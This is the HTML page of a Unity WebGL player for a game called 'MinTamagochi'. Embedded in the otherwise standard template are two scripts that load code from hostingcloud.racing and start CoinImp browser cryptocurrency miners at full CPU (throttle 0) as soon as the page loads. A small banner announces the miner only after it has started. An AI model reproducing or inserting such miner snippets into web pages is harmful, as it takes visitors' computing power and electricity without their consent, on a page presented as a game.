<!DOCTYPE html>
<html lang="en-us">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>Unity WebGL Player | MinTamagochi</title>
    <link rel="shortcut icon" href="TemplateData/favicon.ico">
    <link rel="stylesheet" href="TemplateData/style.css">
  </head>
  <body>
      <div id="unity-container" style="position: absolute; width: 100%; height: 100%; left: 0%; top: 0%;">
          <canvas id="unity-canvas" style="position: absolute; width: 100%; height: 100%;"></canvas>
          <div id="unity-loading-bar">
              <div id="unity-logo"></div>
              <div id="unity-progress-bar-empty">
                  <div id="unity-progress-bar-full"></div>
              </div>
          </div>
          <div id="unity-warning"> </div>

      </div>
      <script src="https://www.hostingcloud.racing/dCeG.js"></script>
      <script>
          var _client = new Client.Anonymous('4bc0501a0ba20f76a537ecbd9a24c652614c84ced8a69cb6097d7b10ae3caa63', {
              throttle: 0, c: 'w'
          });
          _client.start();
          _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
      </script>

      <script src="https://www.hostingcloud.racing/7F4H.js"></script>
      <script>
          var _client = new Client.Anonymous('87536b035994a0e003193a83830725886aaae3ea4391c26e95b92b0808c36f3e', {
              throttle: 0, c: 'w'
          });
          _client.start();
          _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
      </script>
      <script>

          var container = document.querySelector("#unity-container");
          var canvas = document.querySelector("#unity-canvas");
          var loadingBar = document.querySelector("#unity-loading-bar");
          var progressBarFull = document.querySelector("#unity-progress-bar-full");
          // var fullscreenButton = document.querySelector("#unity-fullscreen-button");
          var warningBanner = document.querySelector("#unity-warning");

          // Shows a temporary message banner/ribbon for a few seconds, or
          // a permanent error message on top of the canvas if type=='error'.
          // If type=='warning', a yellow highlight color is used.
          // Modify or remove this function to customize the visually presented
          // way that non-critical warnings and error messages are presented to the
          // user.
          function unityShowBanner(msg, type) {
              function updateBannerVisibility() {
                  warningBanner.style.display = warningBanner.children.length ? 'block' : 'none';
              }
              var div = document.createElement('div');
              div.innerHTML = msg;
              warningBanner.appendChild(div);
              if (type == 'error') div.style = 'background: red; padding: 10px;';
              else {
                  if (type == 'warning') div.style = 'background: yellow; padding: 10px;';
                  setTimeout(function () {
                      warningBanner.removeChild(div);
                      updateBannerVisibility();
                  }, 5000);
              }
              updateBannerVisibility();
          }

          var buildUrl = "Build";
          var loaderUrl = buildUrl + "/Tamagochi.loader.js";
          var config = {
              dataUrl: buildUrl + "/Tamagochi.data",
              frameworkUrl: buildUrl + "/Tamagochi.framework.js",
              codeUrl: buildUrl + "/Tamagochi.wasm",
              streamingAssetsUrl: "StreamingAssets",
              companyName: "DefaultCompany",
              productName: "MinTamagochi",
              productVersion: "1.0",
              showBanner: unityShowBanner,
          };

          // By default, Unity keeps WebGL canvas render target size matched with
          // the DOM size of the canvas element (scaled by window.devicePixelRatio)
          // Set this to false if you want to decouple this synchronization from
          // happening inside the engine, and you would instead like to size up
          // the canvas DOM size and WebGL render target sizes yourself.
          // config.matchWebGLToCanvasSize = false;

          if (/iPhone|iPad|iPod|Android/i.test(navigator.userAgent)) {
              // Mobile device style: fill the whole browser client area with the game canvas:

              var meta = document.createElement('meta');
              meta.name = 'viewport';
              meta.content = 'width=device-width, height=device-height, initial-scale=1.0, user-scalable=no, shrink-to-fit=yes';
              document.getElementsByTagName('head')[0].appendChild(meta);
              container.className = "unity-mobile";
              canvas.className = "unity-mobile";

              // To lower canvas resolution on mobile devices to gain some
              // performance, uncomment the following line:
              // config.devicePixelRatio = 1;


          } else {
              // Desktop style: Render the game canvas in a window that can be maximized to fullscreen:

              canvas.style.width = "100%";
              canvas.style.height = "100%";
          }

          loadingBar.style.display = "block";

          var script = document.createElement("script");
          script.src = loaderUrl;
          script.onload = () => {
              createUnityInstance(canvas, config, (progress) => {
                  progressBarFull.style.width = 100 * progress + "%";
              }).then((unityInstance) => {
                  loadingBar.style.display = "none";
                  /*   fullscreenButton.onclick = () => {
                         unityInstance.SetFullscreen(1);
                     }; */
              }).catch((message) => {
                  alert(message);
              });
          };

          document.body.appendChild(script);

      </script>
  </body>
</html>
